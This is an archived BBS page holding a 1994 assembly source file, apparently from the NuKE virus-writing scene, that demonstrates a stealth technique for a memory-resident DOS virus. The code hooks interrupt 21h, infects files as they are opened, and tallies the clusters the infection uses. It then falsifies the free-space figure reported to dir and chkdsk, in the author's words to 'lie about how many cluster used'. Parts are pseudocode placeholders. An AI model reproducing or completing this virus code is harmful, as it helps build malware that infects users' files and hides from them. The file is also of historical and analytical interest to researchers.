The Unsorted BBS Collection

home *** CD-ROM | disk | FTP | other *** search

/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / live_viruses / virus_collections / vipers.asm < prev next >

Wrap

Assembly Source File | 1994-04-30 | 4KB | 127 lines

New Neat Stuff From The Vx... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ; Stealth.asm, idea and code written by <<-- Viper -->> ; ; function - To demonstrate a new form of stealth ; purpose - To actively monitor the infection of files, so that the ; total disk space reported can appear the same by a dir ; and other commands, as well as chkdsk reporting things such as ; allocation units, space, etc. the same... ; ; Note: This form of stealth works starting on memory residency, and i ; reset each reboot, or memory loss... ; ; Function Idea and Code written by <<-- Viper -->> for Rock Steady & [NuKE ; ------------------------------------------------------------------------- .model tiny .radix 16 .code org 100 virus: check_if_installed install_if_not_already (get, save, trace vectors and all other stuf quit_to_host_program 21_handler: cmp ah,3dh je open cmp ah,36 je NEW_STEALTH_PART2 ; 3d 21_handler (infect_file on open) Just an example, could be done with ; anything (eg, close, 4b, etc...) open: open_file save original bytes infect file jump if error --> fuckit NEW_STEALTH_PART1: ; always do the stealth calcs right ; after a new file has been infected push ax push bx push cx etc... mov ax,3600 xor dl,dl call old21 ; ax=sec/cluster, bx=available clusters, cx=bytes/sector, dx=total/clusters mov cs:[rax],ax mov cs:[rbx],bx mov cs:[rcx],cx mov cs:[rdx],dx mul ax,cx ; this gives bytes/allocation unit xchg ax,bx mov dx,significant reg of filesize ; (saved from previous int) mov ax,insignficant reg of filesize; (saved from previous int) div bx ; ax = dx:ax=filesize / bx=bytes/alloc cmp ax,0 ; ax = # of alloc units je smaller_than_1_alloc cmp dx,0 je exact_divide inc ax mul ax,bx ; dx:ax=largest # bytes b4 next cluster used mov cx,significant reg of filesize mov bx,insignificant reg of filesize ; cx:bx=filesize sub dx,cx sub ax,bx ; now dx:ax is left with 0:#bytes before next clust mov bx,ax ; put ax into bx so that the same code can be used ; over... jmp not_exact_divide_and_larger_than_0_allocs exact_divide: inc cs:[cluster_loss_due_to_infect] ; because our virus > 0 bytes jmp fuckit ; were done our work (in this case, anyways) smaller_than_1_alloc: sub bx,dx not_exact_divide_and_larger_than_0_allocs: cmp bx,virus_size jge fuckit ; no need for adjustment because virus is the same ; or smaller size than the # of bytes left in ; that available cluster inc cs:[cluster_loss_due_to_infect] fuckit: etc... pop cx pop bx pop ax restore stuff (other registers, and callers program stuff) iret NEW_STEALTH_PART2: call old21 add bx,cs:[cluster_loss_due_to_infect] ; lie about how many cluster ; used, and the space left ; on the hard drive... iret old21: pushf callf old21vector dd ? ret rax dw ? rbx dw ? rcx dw ? rdx dw ? cluster_loss_due_to_infect dw 0 end_virus